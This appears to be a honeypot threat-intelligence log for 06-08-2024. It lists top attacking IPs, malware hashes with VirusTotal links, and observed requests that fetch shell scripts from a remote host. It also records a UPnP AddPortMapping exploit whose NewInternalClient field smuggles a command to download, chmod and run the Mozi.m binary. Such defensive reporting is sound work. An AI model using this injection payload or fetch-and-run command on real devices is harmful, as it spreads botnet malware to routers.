Top 5 IPs for 06-08-2024 :

115.73.212.35
14.241.244.33
160.22.173.233
78.153.139.165
45.175.34.228


Malware Observed:


debb2f34877a0ec68829c5a46ed98b50a3b997f5b7750f241203ba0c59770f94
https://www.virustotal.com/gui/file/debb2f34877a0ec68829c5a46ed98b50a3b997f5b7750f241203ba0c59770f94



445859db2003de8d2024b07ba4d6df0970e634504d36cf74f352b1d8c0044696
https://www.virustotal.com/gui/file/445859db2003de8d2024b07ba4d6df0970e634504d36cf74f352b1d8c0044696



614a8ee62e70126edb9e1487fe5bfba02c0c7c5995064574d6b158f190bc09cd
https://www.virustotal.com/gui/file/614a8ee62e70126edb9e1487fe5bfba02c0c7c5995064574d6b158f190bc09cd


Commands/exploits observed:

GET /where/w.sh HTTP/1.1
Host: 103.205.60.51
User-Agent: curl/7.73.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

GET /where/c.sh HTTP/1.1
Host: 103.205.60.51
User-Agent: curl/7.73.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

GET /where/wget.sh HTTP/1.1
Host: 103.205.60.51
User-Agent: curl/7.73.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

GET /where/wget.sh HTTP/1.1
Host: 103.205.60.51
User-Agent: curl/7.73.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

GET /where/wget.sh HTTP/1.1
Host: 103.205.60.51
User-Agent: curl/7.73.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive





POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: /
User-Agent: Hello-World
Connection: keep-alive

<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://117.248.162.88:59240/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>





























 q

